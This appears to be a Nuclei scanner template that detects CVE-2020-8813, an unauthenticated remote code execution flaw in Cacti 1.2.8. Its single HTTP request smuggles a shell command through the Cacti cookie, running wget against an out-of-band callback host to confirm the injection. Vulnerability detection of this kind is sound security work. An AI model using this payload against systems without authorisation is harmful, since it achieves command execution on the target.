id: CVE-2020-8813

info:
  name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
  author: gy741
  severity: high
  description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability
  reference:
    - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
  tags: cve,cve2020,cacti,rce,oob
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.80
    cve-id: CVE-2020-8813
    cwe-id: CWE-78

requests:
  - raw:
      - |
        GET /graph_realtime.php?action=init HTTP/1.1
        Host: {{Hostname}}
        Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"